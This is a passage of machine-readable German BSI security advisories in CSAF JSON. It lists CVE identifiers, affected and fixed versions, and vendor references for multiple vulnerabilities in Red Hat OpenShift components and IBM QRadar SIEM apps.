"text": "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) L\u00f6sung zur Bereitstellung von Applikationen in der Cloud.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren, Daten zu manipulieren, vertrauliche Informationen preiszugeben, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren und beliebigen Code auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-3250 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-3250.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-3250 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-3250"
},
{
"category": "external",
"summary": "Red Hat Advisory vom 2024-10-21",
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8229 vom 2024-10-23",
"url": "https://access.redhat.com/errata/RHSA-2024:8229"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8232 vom 2024-10-23",
"url": "https://access.redhat.com/errata/RHSA-2024:8232"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8260 vom 2024-10-24",
"url": "https://access.redhat.com/errata/RHSA-2024:8260"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8263 vom 2024-10-24",
"url": "https://access.redhat.com/errata/RHSA-2024:8263"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8581 vom 2024-10-29",
"url": "https://access.redhat.com/errata/RHSA-2024:8581"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8676 vom 2024-10-30",
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8425 vom 2024-10-31",
"url": "https://access.redhat.com/errata/RHSA-2024:8425"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8337 vom 2024-10-31",
"url": "https://access.redhat.com/errata/RHSA-2024:8337"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8677 vom 2024-10-30",
"url": "https://access.redhat.com/errata/RHSA-2024:8677"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8428 vom 2024-10-31",
"url": "https://access.redhat.com/errata/RHSA-2024:8428"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8692 vom 2024-11-07",
"url": "https://access.redhat.com/errata/RHSA-2024:8692"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8688 vom 2024-11-06",
"url": "https://access.redhat.com/errata/RHSA-2024:8688"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8697 vom 2024-11-07",
"url": "https://access.redhat.com/errata/RHSA-2024:8697"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8700 vom 2024-11-08",
"url": "https://access.redhat.com/errata/RHSA-2024:8700"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8981 vom 2024-11-13",
"url": "https://access.redhat.com/errata/RHSA-2024:8981"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:10186 vom 2024-11-22",
"url": "https://access.redhat.com/errata/RHSA-2024:10186"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:8704 vom 2024-12-02",
"url": "https://access.redhat.com/errata/RHSA-2024:8704"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:10762 vom 2024-12-03",
"url": "https://access.redhat.com/errata/RHSA-2024:10762"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:10865 vom 2024-12-05",
"url": "https://access.redhat.com/errata/RHSA-2024:10865"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:10857 vom 2024-12-05",
"url": "https://access.redhat.com/errata/RHSA-2024:10857"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:10906 vom 2024-12-10",
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:10895 vom 2024-12-11",
"url": "https://access.redhat.com/errata/RHSA-2024:10895"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:11023 vom 2024-12-12",
"url": "https://access.redhat.com/errata/RHSA-2024:11023"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2024:11293 vom 2024-12-17",
"url": "https://access.redhat.com/errata/RHSA-2024:11293"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:0079 vom 2025-01-08",
"url": "https://access.redhat.com/errata/RHSA-2025:0079"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:0164 vom 2025-01-09",
"url": "https://access.redhat.com/errata/RHSA-2025:0164"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:0323 vom 2025-01-15",
"url": "https://access.redhat.com/errata/RHSA-2025:0323"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:0664 vom 2025-01-23",
"url": "https://access.redhat.com/errata/RHSA-2025:0664"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:0875 vom 2025-02-05",
"url": "https://access.redhat.com/errata/RHSA-2025:0875"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:4019 vom 2025-04-23",
"url": "https://access.redhat.com/errata/RHSA-2025:4019"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:8059 vom 2025-05-21",
"url": "https://access.redhat.com/errata/RHSA-2025:8059"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:8479 vom 2025-06-04",
"url": "https://access.redhat.com/errata/RHSA-2025:8479"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:8551 vom 2025-06-05",
"url": "https://access.redhat.com/errata/RHSA-2025:8551"
}
],
"source_lang": "en-US",
"title": "Red Hat OpenShift: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-06-04T22:00:00.000+00:00",
"generator": {
"date": "2025-06-05T07:41:26.979+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.12"
}
},
"id": "WID-SEC-W-2024-3250",
"initial_release_date": "2024-10-21T22:00:00.000+00:00",
"revision_history": [
{
"date": "2024-10-21T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2024-10-22T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-10-23T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-10-29T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-10-30T23:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-11-06T23:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-11-07T23:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-11-10T23:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-11-12T23:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-11-21T23:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-12-02T23:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-12-03T23:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-12-05T23:00:00.000+00:00",
"number": "13",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-12-09T23:00:00.000+00:00",
"number": "14",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-12-11T23:00:00.000+00:00",
"number": "15",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-12-12T23:00:00.000+00:00",
"number": "16",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-12-17T23:00:00.000+00:00",
"number": "17",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-01-07T23:00:00.000+00:00",
"number": "18",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-01-08T23:00:00.000+00:00",
"number": "19",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-01-14T23:00:00.000+00:00",
"number": "20",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-01-23T23:00:00.000+00:00",
"number": "21",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-02-04T23:00:00.000+00:00",
"number": "22",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-04-22T22:00:00.000+00:00",
"number": "23",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-05-20T22:00:00.000+00:00",
"number": "24",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-06-03T22:00:00.000+00:00",
"number": "25",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-06-04T22:00:00.000+00:00",
"number": "26",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "26"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_version",
"name": "Advanced Cluster Security for Kubernetes 4",
"product": {
"name": "Red Hat Enterprise Linux Advanced Cluster Security for Kubernetes 4",
"product_id": "T027916",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:advanced_cluster_security_for_kubernetes_4"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "Data Foundation 4",
"product": {
"name": "Red Hat OpenShift Data Foundation 4",
"product_id": "T028133",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:data_foundation_4"
}
}
},
{
"category": "product_version",
"name": "Kube Descheduler Operator 5",
"product": {
"name": "Red Hat OpenShift Kube Descheduler Operator 5",
"product_id": "T033270",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:kube_descheduler_operator_5"
}
}
},
{
"category": "product_version_range",
"name": "Network Observability \u003c1.7.0",
"product": {
"name": "Red Hat OpenShift Network Observability \u003c1.7.0",
"product_id": "T038514"
}
},
{
"category": "product_version",
"name": "Network Observability 1.7.0",
"product": {
"name": "Red Hat OpenShift Network Observability 1.7.0",
"product_id": "T038514-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:network_observability__1.7.0"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.17.2",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.17.2",
"product_id": "T038527"
}
},
{
"category": "product_version",
"name": "Container Platform 4.17.2",
"product": {
"name": "Red Hat OpenShift Container Platform 4.17.2",
"product_id": "T038527-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.17.2"
}
}
},
{
"category": "product_version_range",
"name": "\u003c4.14.40",
"product": {
"name": "Red Hat OpenShift \u003c4.14.40",
"product_id": "T038844"
}
},
{
"category": "product_version",
"name": "4.14.40",
"product": {
"name": "Red Hat OpenShift 4.14.40",
"product_id": "T038844-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:4.14.40"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.17.4",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.17.4",
"product_id": "T038989"
}
},
{
"category": "product_version",
"name": "Container Platform 4.17.4",
"product": {
"name": "Red Hat OpenShift Container Platform 4.17.4",
"product_id": "T038989-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.17.4"
}
}
},
{
"category": "product_version_range",
"name": "Data Foundation \u003c4.14.13",
"product": {
"name": "Red Hat OpenShift Data Foundation \u003c4.14.13",
"product_id": "T040215"
}
},
{
"category": "product_version",
"name": "Data Foundation 4.14.13",
"product": {
"name": "Red Hat OpenShift Data Foundation 4.14.13",
"product_id": "T040215-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:data_foundation__4.14.13"
}
}
},
{
"category": "product_version_range",
"name": "Serverless Logic \u003c1.35.0",
"product": {
"name": "Red Hat OpenShift Serverless Logic \u003c1.35.0",
"product_id": "T040597"
}
},
{
"category": "product_version",
"name": "Serverless Logic 1.35.0",
"product": {
"name": "Red Hat OpenShift Serverless Logic 1.35.0",
"product_id": "T040597-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:serverless_logic__1.35.0"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.17.15",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.17.15",
"product_id": "T040819"
}
},
{
"category": "product_version",
"name": "Container Platform 4.17.15",
"product": {
"name": "Red Hat OpenShift Container Platform 4.17.15",
"product_id": "T040819-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.17.15"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.18.10",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.18.10",
"product_id": "T043077"
}
},
{
"category": "product_version",
"name": "Container Platform 4.18.10",
"product": {
"name": "Red Hat OpenShift Container Platform 4.18.10",
"product_id": "T043077-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.18.10"
}
}
},
{
"category": "product_version_range",
"name": "Data Foundation \u003c4.17.7",
"product": {
"name": "Red Hat OpenShift Data Foundation \u003c4.17.7",
"product_id": "T044019"
}
},
{
"category": "product_version",
"name": "Data Foundation 4.17.7",
"product": {
"name": "Red Hat OpenShift Data Foundation 4.17.7",
"product_id": "T044019-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:data_foundation__4.17.7"
}
}
},
{
"category": "product_version_range",
"name": "Data Foundation \u003c4.14.18",
"product": {
"name": "Red Hat OpenShift Data Foundation \u003c4.14.18",
"product_id": "T044338"
}
},
{
"category": "product_version",
"name": "Data Foundation 4.14.18",
"product": {
"name": "Red Hat OpenShift Data Foundation 4.14.18",
"product_id": "T044338-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:data_foundation__4.14.18"
}
}
}
],
"category": "product_name",
"name": "OpenShift"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-34155",
"product_status": {
"known_affected": [
"T028133",
"T038989",
"67646",
"T038527",
"T038844",
"T038514",
"T040819",
"T027916",
"T033270",
"T044019",
"T044338",
"T040215",
"T040597",
"T043077"
]
},
"release_date": "2024-10-21T22:00:00.000+00:00",
"title": "CVE-2024-34155"
},
{
"cve": "CVE-2024-34156",
"product_status": {
"known_affected": [
"T028133",
"T038989",
"67646",
"T038527",
"T038844",
"T038514",
"T040819",
"T027916",
"T033270",
"T044019",
"T044338",
"T040215",
"T040597",
"T043077"
]
},
"release_date": "2024-10-21T22:00:00.000+00:00",
"title": "CVE-2024-34156"
},
{
"cve": "CVE-2024-34158",
"product_status": {
"known_affected": [
"T028133",
"T038989",
"67646",
"T038527",
"T038844",
"T038514",
"T040819",
"T027916",
"T033270",
"T044019",
"T044338",
"T040215",
"T040597",
"T043077"
]
},
"release_date": "2024-10-21T22:00:00.000+00:00",
"title": "CVE-2024-34158"
},
{
"cve": "CVE-2024-39338",
"product_status": {
"known_affected": [
"T028133",
"T038989",
"67646",
"T038527",
"T038844",
"T038514",
"T040819",
"T027916",
"T033270",
"T044019",
"T044338",
"T040215",
"T040597",
"T043077"
]
},
"release_date": "2024-10-21T22:00:00.000+00:00",
"title": "CVE-2024-39338"
},
{
"cve": "CVE-2024-43788",
"product_status": {
"known_affected": [
"T028133",
"T038989",
"67646",
"T038527",
"T038844",
"T038514",
"T040819",
"T027916",
"T033270",
"T044019",
"T044338",
"T040215",
"T040597",
"T043077"
]
},
"release_date": "2024-10-21T22:00:00.000+00:00",
"title": "CVE-2024-43788"
},
{
"cve": "CVE-2024-43796",
"product_status": {
"known_affected": [
"T028133",
"T038989",
"67646",
"T038527",
"T038844",
"T038514",
"T040819",
"T027916",
"T033270",
"T044019",
"T044338",
"T040215",
"T040597",
"T043077"
]
},
"release_date": "2024-10-21T22:00:00.000+00:00",
"title": "CVE-2024-43796"
},
{
"cve": "CVE-2024-43799",
"product_status": {
"known_affected": [
"T028133",
"T038989",
"67646",
"T038527",
"T038844",
"T038514",
"T040819",
"T027916",
"T033270",
"T044019",
"T044338",
"T040215",
"T040597",
"T043077"
]
},
"release_date": "2024-10-21T22:00:00.000+00:00",
"title": "CVE-2024-43799"
},
{
"cve": "CVE-2024-43800",
"product_status": {
"known_affected": [
"T028133",
"T038989",
"67646",
"T038527",
"T038844",
"T038514",
"T040819",
"T027916",
"T033270",
"T044019",
"T044338",
"T040215",
"T040597",
"T043077"
]
},
"release_date": "2024-10-21T22:00:00.000+00:00",
"title": "CVE-2024-43800"
},
{
"cve": "CVE-2024-45296",
"product_status": {
"known_affected": [
"T028133",
"T038989",
"67646",
"T038527",
"T038844",
"T038514",
"T040819",
"T027916",
"T033270",
"T044019",
"T044338",
"T040215",
"T040597",
"T043077"
]
},
"release_date": "2024-10-21T22:00:00.000+00:00",
"title": "CVE-2024-45296"
},
{
"cve": "CVE-2024-45590",
"product_status": {
"known_affected": [
"T028133",
"T038989",
"67646",
"T038527",
"T038844",
"T038514",
"T040819",
"T027916",
"T033270",
"T044019",
"T044338",
"T040215",
"T040597",
"T043077"
]
},
"release_date": "2024-10-21T22:00:00.000+00:00",
"title": "CVE-2024-45590"
},
{
"cve": "CVE-2024-45801",
"product_status": {
"known_affected": [
"T028133",
"T038989",
"67646",
"T038527",
"T038844",
"T038514",
"T040819",
"T027916",
"T033270",
"T044019",
"T044338",
"T040215",
"T040597",
"T043077"
]
},
"release_date": "2024-10-21T22:00:00.000+00:00",
"title": "CVE-2024-45801"
}
]
}
WID-SEC-W-2025-0043
Vulnerability from csaf_certbund - Published: 2025-01-12 23:00 - Updated: 2025-03-17 23:00Summary
IBM QRadar SIEM (Log Source Management App): Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM QRadar Security Information and Event Management (SIEM) bietet Unterstützung bei der Erkennung und Priorisierung von Sicherheitsbedrohungen im Unternehmen.
Angriff
Ein entfernter anonymer Angreifer kann mehrere Schwachstellen in IBM QRadar SIEM ausnutzen, um einen Cross-Site-Scripting-Angriff zu starten, beliebigen Code auszuführen, einen Denial-of-Service-Zustand zu erzeugen, Daten zu manipulieren, vertrauliche Informationen offenzulegen und Sicherheitsmaßnahmen zu umgehen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM QRadar Security Information and Event Management (SIEM) bietet Unterst\u00fctzung bei der Erkennung und Priorisierung von Sicherheitsbedrohungen im Unternehmen.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter anonymer Angreifer kann mehrere Schwachstellen in IBM QRadar SIEM ausnutzen, um einen Cross-Site-Scripting-Angriff zu starten, beliebigen Code auszuf\u00fchren, einen Denial-of-Service-Zustand zu erzeugen, Daten zu manipulieren, vertrauliche Informationen offenzulegen und Sicherheitsma\u00dfnahmen zu umgehen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-0043 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0043.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-0043 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0043"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-01-12",
"url": "https://www.ibm.com/support/pages/node/7180725"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7181570 vom 2025-01-24",
"url": "https://www.ibm.com/support/pages/node/7181570"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7181915 vom 2025-01-29",
"url": "https://www.ibm.com/support/pages/node/7181915"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:0892 vom 2025-02-03",
"url": "https://access.redhat.com/errata/RHSA-2025:0892"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2025:1051 vom 2025-02-05",
"url": "https://access.redhat.com/errata/RHSA-2025:1051"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7184092 vom 2025-02-25",
"url": "https://www.ibm.com/support/pages/node/7184092"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7184955 vom 2025-03-06",
"url": "https://www.ibm.com/support/pages/node/7184955"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7186423 vom 2025-03-17",
"url": "https://www.ibm.com/support/pages/node/7186423"
}
],
"source_lang": "en-US",
"title": "IBM QRadar SIEM (Log Source Management App): Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-03-17T23:00:00.000+00:00",
"generator": {
"date": "2025-03-18T09:12:53.448+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.12"
}
},
"id": "WID-SEC-W-2025-0043",
"initial_release_date": "2025-01-12T23:00:00.000+00:00",
"revision_history": [
{
"date": "2025-01-12T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-01-23T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2025-01-29T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2025-02-02T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-02-04T23:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2025-02-25T23:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2025-02-27T23:00:00.000+00:00",
"number": "7",
"summary": "Produktzuordnung korrigiert"
},
{
"date": "2025-03-06T23:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2025-03-17T23:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von IBM aufgenommen"
}
],
"status": "final",
"version": "9"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "IBM App Connect Enterprise",
"product": {
"name": "IBM App Connect Enterprise",
"product_id": "T032495",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:-"
}
}
},
{
"category": "product_version_range",
"name": "\u003c13.0.2.1",
"product": {
"name": "IBM App Connect Enterprise \u003c13.0.2.1",
"product_id": "T040605"
}
},
{
"category": "product_version",
"name": "13.0.2.1",
"product": {
"name": "IBM App Connect Enterprise 13.0.2.1",
"product_id": "T040605-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:13.0.2.1"
}
}
},
{
"category": "product_version_range",
"name": "\u003c12.0.12.10",
"product": {
"name": "IBM App Connect Enterprise \u003c12.0.12.10",
"product_id": "T040606"
}
},
{
"category": "product_version",
"name": "12.0.12.10",
"product": {
"name": "IBM App Connect Enterprise 12.0.12.10",
"product_id": "T040606-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:12.0.12.10"
}
}
}
],
"category": "product_name",
"name": "App Connect Enterprise"
},
{
"branches": [
{
"category": "product_version_range",
"name": "Log Source Management App \u003c7.0.11",
"product": {
"name": "IBM QRadar SIEM Log Source Management App \u003c7.0.11",
"product_id": "T040117"
}
},
{
"category": "product_version",
"name": "Log Source Management App 7.0.11",
"product": {
"name": "IBM QRadar SIEM Log Source Management App 7.0.11",
"product_id": "T040117-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:qradar_siem:log_source_management_app__7.0.11"
}
}
},
{
"category": "product_version",
"name": "7.5.0",
"product": {
"name": "IBM QRadar SIEM 7.5.0",
"product_id": "T041207",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:qradar_siem:7.5.0"
}
}
},
{
"category": "product_version_range",
"name": "Data Synchronization App \u003c3.2.1",
"product": {
"name": "IBM QRadar SIEM Data Synchronization App \u003c3.2.1",
"product_id": "T041488"
}
},
{
"category": "product_version",
"name": "Data Synchronization App 3.2.1",
"product": {
"name": "IBM QRadar SIEM Data Synchronization App 3.2.1",
"product_id": "T041488-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:qradar_siem:data_synchronization_app__3.2.1"
}
}
}
],
"category": "product_name",
"name": "QRadar SIEM"
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-43788"
},
{
"cve": "CVE-2024-43796",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-43796"
},
{
"cve": "CVE-2024-43799",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-43799"
},
{
"cve": "CVE-2024-43800",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-43800"
},
{
"cve": "CVE-2024-47068",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-47068"
},
{
"cve": "CVE-2024-47875",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-47875"
},
{
"cve": "CVE-2024-21536",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-21536"
},
{
"cve": "CVE-2024-21538",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-21538"
},
{
"cve": "CVE-2024-33883",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-33883"
},
{
"cve": "CVE-2024-37890",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-37890"
},
{
"cve": "CVE-2024-4067",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
"release_date": "2025-01-12T23:00:00.000+00:00",
"title": "CVE-2024-4067"
},
{
"cve": "CVE-2024-4068",
"product_status": {
"known_affected": [
"T040606",
"T040605",
"67646",
"T041207",
"T040117",
"T041488",
"T032495"
]
},
